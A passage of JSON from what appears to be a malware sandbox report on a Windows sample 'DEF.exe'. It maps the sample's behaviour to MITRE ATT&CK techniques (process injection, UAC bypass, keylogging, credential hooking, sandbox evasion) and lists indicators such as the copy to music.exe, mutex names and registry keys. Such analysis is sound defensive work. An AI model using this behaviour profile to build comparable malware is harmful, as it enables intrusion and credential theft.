"informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "AppInit DLLs", "attck_id": "T1546.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/010", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Direct Volume Access", "attck_id": "T1006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1006", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 22}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "malicious_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"DEF.exe\" called \"CopyFileW\" to copy C:\\DEF.exe to new location %ALLUSERSPROFILE%\\db\\music.exe (UID: 00000000-00006032)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"DEF.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 752C0000\n \"music.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 752C0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 752C0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Rmc-GHRUZU\"\n \"\\Sessions\\1\\BaseNamedObjects\\_SHuassist.mtx\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Rmc-GHRUZU\"\n \"Local\\ZonesCacheCounterMutex\"\n \"_SHuassist.mtx\"\n \"Local\\ZonesLockedCacheCounterMutex\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"DEF.exe\" touched \"Offline Files Cache Control\" (Path: \"HKCU\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\")\n \"DEF.exe\" touched \"Offline Files Service Control\" (Path: \"HKCU\\CLSID\\{69486DD6-C19F-42E8-B508-A53F9F8E67B8}\")\n \"DEF.exe\" touched \"PSFactoryBuffer\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{EFB23A09-A867-4BE8-83A6-86969A7D0856}\")\n \"DEF.exe\" touched \"Offline Files Setting Object\" (Path: \"HKCU\\CLSID\\{FD3659E9-A920-4123-AD64-7FC76C7AACDF}\\TREATAS\")\n \"DEF.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"DEF.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")\n \"DEF.exe\" touched \"Previous Versions Property Page\" (Path: \"HKCU\\CLSID\\{596AB062-B4D2-4215-9F74-E9109B0A8153}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"Microsoft SendTo Service\" (Path: \"HKCU\\CLSID\\{7BA4C740-9E81-11CF-99D3-00AA004AE837}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"Copy as Path Menu\" (Path: \"HKCU\\CLSID\\{F3D06E7C-1E45-4A26-847E-F9FCDEE59BE0}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"Start Menu Pin\" (Path: \"HKCU\\CLSID\\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"Start Menu Cache\" (Path: \"HKCU\\CLSID\\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\\TREATAS\")\n \"DEF.exe\" touched \"Taskband Pin\" (Path: \"HKCU\\CLSID\\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\\TREATAS\")\n \"DEF.exe\" touched \"Shortcut\" (Path: \"HKCU\\CLSID\\{00021401-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}\")\n \"DEF.exe\" touched \"Internet Shortcut\" (Path: \"HKCU\\CLSID\\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}\")\n \"DEF.exe\" touched \"User Pinned\" (Path: \"HKCU\\CLSID\\{1F3427C8-5C10-4210-AA03-2EE45287D668}\\SHELLFOLDER\")\n \"DEF.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{F3364BA0-65B9-11CE-A9BA-00AA004AE837}\\INPROCSERVER32\")\n \"DEF.exe\" touched \"User Assist\" (Path: \"HKCU\\CLSID\\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\\TREATAS\")\n \"DEF.exe\" touched \"Shared Task Scheduler\" (Path: \"HKCU\\CLSID\\{603D3801-BD81-11D0-A3A5-00C04FD706EC}\\TREATAS\")\n \"DEF.exe\" touched \"Groove GFS Context Menu Handler\" (Path: \"HKCU\\CLSID\\{6C467336-8281-4E60-8204-430CED96822D}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"Shell extensions for sharing\" (Path: \"HKCU\\CLSID\\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"Share Command State Handler\" (Path: \"HKCU\\CLSID\\{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2}\\INPROCSERVER32\")\n \"DEF.exe\" touched \"Sharing Configuration Manager\" (Path: \"HKCU\\CLSID\\{49F371E1-8C5C-4D9C-9A3B-54A6827F513C}\\TREATAS\")\n \"DEF.exe\" touched \"Encryption Context Menu\" (Path: \"HKCU\\CLSID\\{A470F8CF-A1E8-4F65-8335-227475AA5C46}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"Open With Context Menu Handler\" (Path: \"HKCU\\CLSID\\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS\")\n \"DEF.exe\" touched \"Briefcase\" (Path: \"HKCU\\CLSID\\{85BBD920-42A0-1069-A2E4-08002B30309D}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"7-Zip Shell Extension\" (Path: \"HKCU\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"CompatContextMenu Class\" (Path: \"HKCU\\CLSID\\{1D27F844-3A1F-4410-85AC-14651078412D}\\SHELLEX\\NOADDTORECENT\")\n \"DEF.exe\" touched \"Remove Properties Drop Target\" (Path: \"HKCU\\CLSID\\{09A28848-0E97-4CEF-B950-CEA037161155}\\SUPPORTEDPROTOCOLS\")\n \"DEF.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"DEF.exe\" loaded module \"RSTRTMGR\" at base 6cb90000\n \"DEF.exe\" loaded module \"KERNEL32.DLL\" at base 76380000\n \"DEF.exe\" loaded module \"OLE32.DLL\" at base 76460000\n \"DEF.exe\" loaded module \"CRYPTBASE.DLL\" at base 756a0000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74220000\n \"DEF.exe\" loaded module \"ADVAPI32.DLL\" at base 75f00000\n \"DEF.exe\" loaded module \"PROPSYS.DLL\" at base 74440000\n \"DEF.exe\" loaded module \"COMCTL32.DLL\" at base 74670000\n \"DEF.exe\" loaded module \"OLEAUT32.DLL\" at base 75b20000\n \"DEF.exe\" loaded module \"SHELL32.DLL\" at base 76c50000\n \"DEF.exe\" loaded module \"CLBCATQ.DLL\" at base 76ad0000\n \"DEF.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74440000\n \"DEF.exe\" loaded module \"NTMARTA.DLL\" at base 74c10000\n \"DEF.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75b00000\n \"DEF.exe\" loaded module \"PROFAPI.DLL\" at base 757b0000\n \"DEF.exe\" loaded module \"APPHELP.DLL\" at base 75650000\n \"DEF.exe\" loaded module 